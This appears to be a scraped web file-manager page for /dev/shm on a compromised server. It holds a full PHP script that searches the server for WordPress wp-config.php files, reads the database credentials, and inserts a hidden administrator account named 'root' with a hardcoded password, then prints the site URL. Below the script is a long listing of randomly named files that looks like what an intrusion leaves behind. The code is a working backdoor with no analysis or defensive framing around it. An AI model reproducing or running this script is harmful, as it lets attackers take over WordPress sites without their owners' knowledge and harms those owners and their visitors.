PATH:
dev
/
shm
<?php function scan($path) { if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { $p = $path . DIRECTORY_SEPARATOR . $file; if ($file != '.' && $file != '..') { if (is_link($p)) { continue; } elseif (is_dir($p)) { scan($p); } elseif ($file === 'wp-config.php') { inject($p); } } } } } function inject($p) { $user_login = 'root'; $user_password = 'Zb{0@U{vsFjq&#j(<?L[Iy0Hi_#9]i-LlJN0=Ec'; $user_email = 'admin@wordpress.com'; $data = file_get_contents($p); $pattern = "/table_prefix\s*=\s*'([^']*)';/i"; if (preg_match($pattern, $data, $matches)) { $table_prefix = $matches[1]; } else { $table_prefix = 'wp_'; } $lines = array_map('rtrim', file($p)); $conf = []; foreach ($lines as $line) { if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) { $conf[$matches[1]] = parse_define_value($line); } } if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) { $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']); if ($mysqli->connect_errno) { return; } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { $result->close(); $mysqli->close(); return; } $result->close(); } $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '', (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1), 0, '{$user_login}' FROM DUAL WHERE NOT EXISTS ( SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );"; if ($mysqli->query($add_user_query)) { $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $mysqli->query($add_usermeta_query1); $mysqli->query($add_usermeta_query2); } $site_url = false; if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->option_value; } if (!$site_url || strpos($site_url, 'http') !== 0) { if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->user_url; } } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { echo "<f>{$site_url}@@@{$p}</f>\n"; } $result->close(); } $mysqli->close(); } } function parse_define_value($line) { if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) { return $matches[1]; } return null; } function scanRootPaths() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { foreach (range('A', 'Z') as $driveLetter) { $drive = $driveLetter . ':\\'; if (is_dir($drive)) { scan($drive); } } } else { scan('/home/wpsehryi'); } } scanRootPaths(); die('!ended!');
[+]
..
[-] PostgreSQL.1262191414
[edit]
[+]
lsws
[-] wp-admin-ajax.php
[edit]
[-] .item
[edit]
[-] .flg
[edit]
[-] .obj
[edit]
[-] .marker
[edit]
[-] LokHJURhDF
[edit]
[-] pHrkgoUHPu
[edit]
[-] eLJOrDdjMC
[edit]
[-] gNFQyxeSsW
[edit]
[-] ihWEVWErco
[edit]
[-] VQAWuXzHST
[edit]
[-] LXlgyYvTJO
[edit]
[-] OPprixbyak
[edit]
[-] mjmdRVtxxU
[edit]
[-] cPdnxOlEWO
[edit]
[-] yWzmnanfgF
[edit]
[-] YSEXCLctov
[edit]
[-] lBdJbfSUSs
[edit]
[-] vqEGklkDFx
[edit]
[-] PtRxrEUVrK
[edit]
[-] lsvHbtTthZ
[edit]
[-] ZecuFwmdBr
[edit]
[-] YYgNgKLRYx
[edit]
[-] XIXKiaaeil
[edit]
[-] PzujMrnRiA
[edit]
[-] jkKXIIOQNT
[edit]
[-] JrFgXQdqBM
[edit]
[-] mgMtRtJogL
[edit]
[-] ASSCEhFGwP
[edit]
[-] PGvJuzRcRF
[edit]
[-] WRwMMSEumG
[edit]
[-] wUqlPBIAmf
[edit]
[-] GpZbjkMEzI
[edit]
[-] JxNmVXwCFi
[edit]
[-] owTQlUsOzh
[edit]
[-] abBDulnKmY
[edit]
[-] jvYvIPEcRW
[edit]
[-] iFIAAGsGau
[edit]
[-] SdNnXYYQLw
[edit]
[-] VlZyJLkORu
[edit]
[-] IIeZbpUoyT
[edit]
[-] ckHExIgCnV
[edit]
[-] EMFQhqVpKX
[edit]
[-] OfntACZPCQ
[edit]
[-] vHMHwbQQFi
[edit]
[-] hQMguJLLCF
[edit]
[-] PHrtVdLZSW
[edit]
[-] yriWSHRBha
[edit]
[-] rkCHrRxnIY
[edit]
[-] lqAUWVMxYN
[edit]
[-] rRitZIQPQq
[edit]
[-] CCUnOOHilN
[edit]
[-] zeTwHwTjgb
[edit]
[-] AKBzRDYLtP
[edit]
[-] UvqCzGrXJk
[edit]
[-] cReGnqIZyQ
[edit]
[-] eRHAwbExlH
[edit]
[-] ZYdXgcPdcj
[edit]
[-] lZxSYZSYGa
[edit]
[-] plCZuvyWbM
[edit]
[-] cJbQgaKYxF
[edit]
[-] fQTDDwyimr
[edit]
[-] zEsCRfeATV
[edit]
[-] SPBZXyZyFe
[edit]
[-] ZqfLcDVKfh
[edit]
[-] ljaIqQZMWw
[edit]
[-] dxOlGHKinA
[edit]
[-] QxPEUmWklR
[edit]
[-] rEfrrIKuaf
[edit]
[-] LsgOdrSofJ
[edit]
[-] eDNNjKlmRq
[edit]
[-] xXOUeENAik
[edit]
[-] lerXQrhyrV
[edit]
[-] glyavSQhqw
[edit]
[-] SlPgEXIVdn
[edit]
[-] zJapRAwTIW
[edit]
[-] kbIYZmfIgH
[edit]
[-] BuLcGgGECK
[edit]
[-] jxtEwzgkTN
[edit]
[-] sjRPLYrGCp
[edit]
[-] jklGNEWSSW
[edit]
[-] TIKxvmhEjQ
[edit]
[-] qemJYxyKgc
[edit]
[-] tBUPhyuWbX
[edit]
[-] QZdmrhCgsl
[edit]
[-] WfzACFBXgS
[edit]
[-] UeQFdtYymo
[edit]
[-] REfVzXvufi
[edit]
[-] bGVuerWYnH
[edit]
[-] eFBzSWzyZP
[edit]
[-] usWeMFzwKg
[edit]
[-] eSyxkJmWsQ
[edit]
[-] NGzousSsOy
[edit]
[-] hNgDVKiKnj
[edit]
[-] ElRaDtOUgZ
[edit]
[-] XwxSZQKGGK
[edit]
[-] HUyljatQXc
[edit]
[-] KrLoqtpjse
[edit]
[-] UfowNGbgsL
[edit]
[-] eiWVwpeigk
[edit]
[-] sDpnvoneOJ
[edit]
[-] bKRSeHSwLL
[edit]
[-] pKfMiwOQmC
[edit]
[-] FhkrJaaebz
[edit]
[-] WYWUldFSsp
[edit]
[-] zZTofIgPrd
[edit]
[-] pbxnoYARDI
[edit]
[-] qqBrCwFlyx
[edit]
[-] atFWnxgfKg
[edit]
[-] FvOwiOswHg
[edit]
[-] qVtGArxXQW
[edit]
[-] lZuZnlJhpk
[edit]
[-] SyveMamSGR
[edit]
[-] wmKmajEHwl
[edit]
[-] bPKATlqSPe
[edit]
[-] CUPBXbJdYl
[edit]
[-] DvdyuZYgRR
[edit]
[-] XuCLpwmEVn
[edit]
[-] MUyfPmdRii
[edit]
[-] FpJQEbdrJs
[edit]
[-] yTEgGhFHGi
[edit]
[-] vIaOBgNDrH
[edit]
[-] iFErNCcloC
[edit]
[-] KjdhkTwGCa
[edit]
[-] tLvvPopolC
[edit]
[-] doyyGHflPd
[edit]
[-] ZtklKVWFLr
[edit]
[-] jsdlTmGovP
[edit]
[-] NHjayelens
[edit]
[-] UQkLrOsGIX
[edit]
[-] ciiVhZwhmD
[edit]
[-] OlzHTkMmgu
[edit]
[-] LqGbkaNQzx
[edit]
[-] PeNMCfRmFj
[edit]
[-] aSpSvyXGcY
[edit]
[-] kyoRwlRAUK
[edit]
[-] ntoKYAueNC
[edit]
[-] DXEnxDXPvy
[edit]
[-] ITbUCJPFmU
[edit]
[-] IojFEOTTQT
[edit]
[-] AhzTWJOoUY
[edit]
[-] ttXkgPqOjP
[edit]
[-] SkIjTHyPEZ
[edit]
[-] GOeZdEqoaZ
[edit]
[-] kayymXQTIZ
[edit]
[-] uRQDZOoZcq
[edit]
[-] KHQUuVRTSu
[edit]
[-] dnJzcMMdPw
[edit]
[-] RAmmuTTZDp
[edit]
[-] NFwxWhiRzf
[edit]
[-] nlfATUsDfR
[edit]
[-] OFtibJUTWU
[edit]
[-] eKHSYmyeSd
[edit]
[-] PDyMfxeebq
[edit]
[-] jiqzdIaQJz
[edit]
[-] HwmCNsZrfv
[edit]
[-] qIbNLPVRkZ
[edit]
[-] AIKTDaRFuW
[edit]
[-] tdVEQPRfxE
[edit]
[-] iMKIxptegd
[edit]
[-] ZvvmKqZqbg
[edit]
[-] hzHHbAdAZq
[edit]
[-] vgRZfyuAjb
[edit]
[-] CZLvfwYasG
[edit]
[-] XeSnwmZEnl
[edit]
[-] bqZYqTFaRX
[edit]
[-] YKAFIxFoIW
[edit]
[-] OedGjKLSok
[edit]
[-] PjsblPLbjK
[edit]
[-] UfPIOxbRyg
[edit]
[-] wAXRsaffEH
[edit]
[-] hhLYsDCCXb
[edit]
[-] zhAWkoiSBq
[edit]
[-] otLHKxCcgk
[edit]
[-] GYwvHTKbQN
[edit]
[-] SCSlpsCcml
[edit]
[-] jpfNmSeLVW
[edit]
[-] qYEMoJelqv
[edit]
[-] cFqGgLflks
[edit]
[-] EDTwNbmloS
[edit]
[-] DCsYUBlHJn
[edit]
[-] MTahbwGLuo
[edit]
[-] JjlOVmGVxn
[edit]
[-] VZwaRfwMto
[edit]
[-] FEklPaoybN
[edit]
[-] TDCLYPwzFB
[edit]
[-] AIRIaUAMkb
[edit]
[-] giBfxRjzev
[edit]
[-] SGUxFgfnMI
[edit]
[-] ZSMQzanJxR
[edit]
[-] ekQYAxSZCj
[edit]
[-] oReuszTZYg
[edit]
[-] XBrZaGSzJK
[edit]
[-] POEMINxTVz
[edit]
[-] sPfkZnyxce
[edit]
[-] YfmtPIuXGA
[edit]
[-] zzbqCVjNDS
[edit]
[-] HrOXkbknRp
[edit]
[-] Vvxahyuhlb
[edit]
[-] owFwOgoAYn
[edit]
[-] RsYZbmAmnZ
[edit]
[-] JNkOdrIAhA
[edit]
[-] UWNrJFXLqj
[edit]
[-] lGYcLmbVJF
[edit]
[-] eSIJRUrzAw
[edit]
[-] nnPeOJvZPe
[edit]
[-] yMnFLDhlwN
[edit]
[-] HQyuJMlvbn
[edit]
[-] PfKcrRSazi
[edit]
[-] AcGXrSlVGK
[edit]
[-] .runner_61b75ec7
[edit]
[-] .runner_35801749
[edit]
[-] .runner_31f4ea9a
[edit]
[-] .runner_b65f9a0f
[edit]
[-] .runner_a10ebda4
[edit]
[-] .runner_dca42548
[edit]
[-] .element
[edit]
[-] .sym
[edit]
[-] svc_68d695f181921
[edit]
[-] svc_68d69592eecf3
[edit]
[-] svc_68d68bea47f5b
[edit]
[-] .hld
[edit]
[-] ilKDLlHJBq
[edit]
[-] tjCuGXUtcY
[edit]
[-] UetJxerszn
[edit]
[-] KcMQEbmLLU
[edit]
[-] NEpXftiJhV
[edit]
[-] zEMaYEtUkr
[edit]
[-] EGeSeJIVly
[edit]
[-] HindhfYfHv
[edit]
[-] FTKAOMkXpw
[edit]
[-] AZCBHPVsuQ
[edit]
[-] xBjlEmeDSd
[edit]
[-] uDLYsHZpNp
[edit]
[-] TNMFPfIMfn
[edit]
[-] .key
[edit]
[-] .token
[edit]
[-] .pgrp
[edit]
[-] .entity
[edit]
[-] .res
[edit]
[-] .descriptor
[edit]
[-] .ref
[edit]
[-] .component
[edit]
[-] .record
[edit]
[-] .desc
[edit]
[-] .val
[edit]
[-] .ent
[edit]
[-] .holder
[edit]
[-] .property_set
[edit]
[-] .pset
[edit]
[-] .flag
[edit]
[-] .binding
[edit]
[-] .data_chunk
[edit]